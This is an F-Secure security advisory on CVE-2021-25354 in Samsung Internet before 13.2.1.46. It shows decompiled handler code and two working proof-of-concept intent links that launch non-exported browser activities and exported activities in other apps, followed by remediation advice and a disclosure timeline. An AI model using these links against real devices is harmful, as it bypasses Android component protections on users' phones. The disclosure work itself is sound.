Samsung Galaxy - Open Activities Via Samsung Browser

Product Android devices with Samsung Internet (prior to version 13.2.1.46)
Severity Medium
CVE Reference CVE-2021-25354
Type Application security bypass

Description

F-Secure looked into exploiting the Samsung S20 device for Tokyo Pwn2Own 2020. An issue was discovered that allowed a specific browsable intent in Samsung Browser (com.sec.android.app.sbrowser) to either:

  • Launch non-exported activities in the Samsung Browser application
  • Launch an exported activity in any installed application

Note that while this issue was found on a Samsung Galaxy device, the Samsung Internet browser application is available on the Google Play store and can be installed on any Android device with access to said store. It was confirmed that this issue could be exploited on any Android device that had the Samsung Internet application installed

Technical Details

The issue is due to the class "com.sec.android.app.sbrowser.capsule.BixbySBrowserLauncherActivity" methods "handleIntent" and "handleShareVia". First, "handleIntent" does the following:

  • Parses the passed intent and establishes the URI "data" from the intent's data
  • Parses the URI "data" and establishes the list "pathSegments" from the URI's path segments
  • If the first item in the list "pathSegments" is "ShareVia", then the method "handleShareVia" is executed
private void handleIntent(final Intent intent) {
final String action = intent.getAction();
final Uri data = intent.getData();
int n = 1;
if ("android.intent.action.VIEW".equals(action) && data != null) {
final String string = data.toString();
final List pathSegments = data.getPathSegments();
if ((this.mPathSegments = (List<String>)pathSegments) != null) {
if (pathSegments.size() != 0) {
final String pathSegments2 = this.getPathSegments(0);
if (pathSegments2 == null) {
return;
}
Label_0738: {
switch (pathSegments2.hashCode()) {
...
case -679124017: {
if (pathSegments2.equals("ShareVia")) {
n = 4;
break Label_0738;
}
break;
}
...
switch (n) {
...
case 4: {
this.handleShareVia();
break;
}

Next, "handleShareVia" does the following:

  • Creates a new intent "createIntentWithTargetTask"
  • Checks if the second item in the list "pathSegments" is "result_type_success"
  • Checks if the third and fouth items in the list "pathSegments" are not null
  • If the fourth item in the list "pathSegments" is not "com.sec.android.app.sbrowser.ReceiveWeChatMomentActivity", then assign the following "createIntetWithTargetTask" extra values:
    • "packageName" = the third item in the list "pathSegments"
    • "activityName" = the fourth item in the list "pathSegments"
  • Start the activity outlined in the intent "createIntentWithTargetTask"
private void handleShareVia() {
String pathSegments = getPathSegments(1);
if (pathSegments != null) {
Intent createIntentWithTargetTask = createIntentWithTargetTask("com.sec.android.app.sbrowser.INTENT_SHARE_VIA");
createIntentWithTargetTask.putExtra("resultType", pathSegments);
if ("result_type_success".equals(pathSegments)) {
String pathSegments2 = getPathSegments(2);
String pathSegments3 = getPathSegments(3);
if (pathSegments2 != null && pathSegments3 != null) {
if (pathSegments3.equals("com.sec.android.app.sbrowser.ReceiveWeChatMomentActivity") && !this.isWeChatAvailable()) {
Log.d("BixbyLauncherActivity", "WeChat is not installed!");
createIntentWithTargetTask.putExtra("resultType", "result_type_fail");
} else {
createIntentWithTargetTask.putExtra("packageName", pathSegments2);
createIntentWIthTargetTask.putExtra("activityName", pathSegments3);
}
} else {
return;
}
...
try {
getApplicationContext().startActivity(createIntentWithTargetTask);
} catch (ActivityNotFoundException e) {
Log.d("BixbyLauncherActivity", "[handleShareVia]" + e.toString());
}
}
}

Using this information, it is possible to create a custom intent that launches a specific activity:

intent://com.sec.android.app.sbrowser/ShareVia/result_type_success/<package name>/<activity name>

The following example browsable intent link will launch the non-exported component "com.sec.android.app.sbrowser/com.google.zxing.client.android.SecCaptureActivity" in the Samsung Browser application:

<a href="intent://com.sec.android.app.sbrowser/ShareVia/result_type_success/com.sec.android.app.sbrowser/com.google.zxing.client.android.SecCaptureActivity/#Intent;scheme=samsunginternet;action=android.intent.action.VIEW;package=com.sec.android.app.sbrowser;end">click here</a>

By replacing the appropriate fields, it is also possible to launch activities that are exported in other applications. The following browsable intent link will launch the exported component "com.sec.android.app.myfiles/com.sec.android.app.myfiles.external.ui.PickerActivity":

<a href="intent://com.sec.android.app.sbrowser/ShareVia/result_type_success/com.sec.android.app.myfiles/com.sec.android.app.myfiles.external.ui.PickerActivity/#Intent;scheme=samsunginternet;action=android.intent.action.VIEW;package=com.sec.android.app.sbrowser;end">click here</a>

Remedial Action

Samsung has released Samsung Browser version 13.2.1.46 which fixes the issue outlined in this advisory. F-Secure recommends that users upgrade Samsung Browser to at least version 13.2.1.46.

Timeline

Date Summary
02/11/2020 Issue disclosed to Samsung Mobile Security
02/11/2020 Issue assigned to a Samsung Security Analyst
12/01/2021 Follow up sent to Samsung
17/01/2021 Samsung confirms the vulnerability and rates it as a moderate risk issue
09/02/2021 Patch released, Samsung initiates process for bug bounty reward
12/03/2021 Bug Bounty Paid
25/03/2021 CVE published by Samsung
26/03/2021 Advisory published